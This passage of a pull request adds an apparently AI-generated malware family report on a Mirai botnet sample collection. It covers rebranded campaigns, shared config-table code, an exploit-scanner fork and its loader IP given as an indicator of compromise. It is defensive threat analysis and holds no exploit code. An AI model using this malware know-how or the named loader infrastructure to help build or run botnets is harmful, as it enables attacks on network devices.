+`analysis:stub-only` (54), `campaign:boatnet` (33), `campaign:demons` (14),
+`campaign:nuclear` (7), `campaign:frosted` (1), `loader:37.48.254.120` (1).
+
+File notes on `mipsel` (exploit modules + loader IOCs) and `chrome`
+(cluster-based attribution + `FROSTED` branding), plus five LLM function notes.
+
+Because the function tags were applied to *cluster members*, every stripped
+`FUN_xxxxxxxx` in the collection that shares Mirai's config-table routine is now
+labelled `mirai:config_table` — the naming propagates without touching Ghidra.
+
+## 10. Conclusions
+
+1. `mirai7` is **one code base with many rebrands**, not many families. The
+   `table_init` config-table routine is shared, essentially unmodified, by 34 of
+   the 174 files across 8 architectures — that's the family fingerprint.
+2. The visible partitioning is **campaign-driven**: `boatnet` (33), `DEMONS` (14),
+   `nuclear` (7, symbolised), `Frosted`/`chrome`, `iran`, `cock`/`net`/`dicknet`,
+   plus packed duplicates of the same builds.
+3. At least two forks made real source-level changes: the `mipsel` fork added
+   exploit scanners (D-Link/Comtrend/Huawei/Realtek/ADB) dropping from loader
+   `37.48.254.120`, and the `cock`/`net`/`dicknet` fork renamed the killer to
+   `competitiveKiller`.
+4. Attribution of the 43 hash-named unknowns is achievable: 13 of them fall onto
+   two C2 IPs, and the rest land in high-cohesion binary clusters or in the
+   `table_init` / `attack_parse` function clusters with named siblings.
+5. 55 UPX-packed samples are dead weight for similarity analysis — unpack and
+   re-ingest before drawing statistical conclusions about the collection.
+
+### Recommended follow-ups
+
+* Unpack the 55 UPX samples, re-upload, re-run `cluster/rebuild_all`.
+* Bulk-tag the `table_init` cluster members (`tags/bulk_add`) as
+  `mirai:config_table` so the naming propagates in the UI.
+* Extract the config table contents per sample (the `DAT_*` referenced by
+  `table_init`) — that yields C2 domains for the 161 samples with no `cc_ip`.


### PR DESCRIPTION
Two reports produced by driving the BSimVis REST API against collection `mirai7` (174 files, 34.5k functions).

- `doc/reports/mirai7_family_report.md` — malware family report: campaign breakdown, binary clustering, cross-architecture function reuse (`table_init` shared by 34 files across 8 ISAs), the exploit-scanner fork and its loader IOC, LLM triage, and the tags/notes written back into the collection.
- `doc/reports/api_pivoting_review.md` — how the API was used (curl-level walkthrough of the corpus → cluster → binary pair → function cluster → source pivot), an assessment of its fitness for pivoting, and 13 documentation gaps with proposed `AGENTS.md` sections.

Docs only — no code changes. The `mirai7` collection was annotated in place (function/file tags, notes) via the API.

🤖 Generated with [Claude Code](https://claude.com/claude-code)